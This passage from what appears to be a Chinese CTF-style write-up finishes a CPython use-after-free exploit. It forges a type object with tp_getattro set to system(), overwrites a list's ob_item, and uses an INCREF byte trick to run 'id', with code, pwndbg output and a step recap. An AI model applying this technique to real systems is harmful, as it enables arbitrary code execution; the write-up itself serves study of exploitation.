利用此行为:将命令首字节减 1 后存入。'i' 的 ASCII 码为 105,减 1 得 104 = 'h'。INCREF 后 'h' → 'i',命令即正确。

cmd = bytes([ord('i') - 1]) + b"d\x00\x00\x00\x00\x00\x00"   # b"hd\x00..."
 
fake_obj = cmd + p64(fake_type_addr) + b"\x00" * 0x100
#  [0..7]   ob_refcnt = b"hd\x00..."  ← Py_INCREF 后变为 b"id\x00..."
#  [8..15]  ob_type   = fake_type_addr
#  [16..]   padding

ob_item 指针覆写

list 对象的内部结构:

PyListObject:
  +0x00  ob_refcnt
  +0x08  ob_type
  +0x10  ob_size          (len(list))
  +0x18  ob_item          (PyObject **,指向 payload 数组)
  +0x20  allocated
payload = [None]
w64(r64(id(payload) + 0x18), fake_obj_addr)   # 覆写 ob_item[0]

pwndbg 在 break PyObject_GetAttr 处停下(payload[0].pwned 触发的调用):

─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
*RDI  0x7ffff74acae0 ◂— 0x6469 /* 'id' */     ← fake_obj,INCREF 后已为 'id'
*RSI  0x7ffff7505990 ◂— 0xffffffff             ← PyUnicode "pwned"
 RIP  0x504607 (PyObject_GetAttr) ◂— endbr64

执行结果:

uid=1000(ivan) gid=1000(ivan) groups=1000(ivan),27(sudo)

收尾:完整 exploit 流程回顾

从 UAF 触发到命令执行,没有 shellcode、没有 ROP,全程利用解释器自己的 C 函数指针调度:

  1. fake_ba 堆喷把一个 bytearray 的 ob_bytes 改成 NULL,ob_size 改成 MAX → 物理内存窗口打开
  2. r64/w64 通过 bytearray 下标访问实现任意地址读写
  3. ELF basePyLong_Type.tp_dealloc 指针反推
  4. system() 通过 ELF 的 PT_DYNAMIC → rela.plt 在运行时解析
  5. fake PyTypeObjecttp_getattro 填成 system()
  6. ob_item 覆写payload[0] 指向一个伪造的 Python 对象,该对象的 ob_refcnt 处存着命令字符串
  7. INCREF trick 利用 Python 的 BINARY_SUBSCR 自动 INCREF,把命令第一字节从 'h'(0x68) 变成 'i'(0x69)
  8. payload[0].pwnedPyObject_GetAttr → tp_getattro(obj) → system("id")

(完)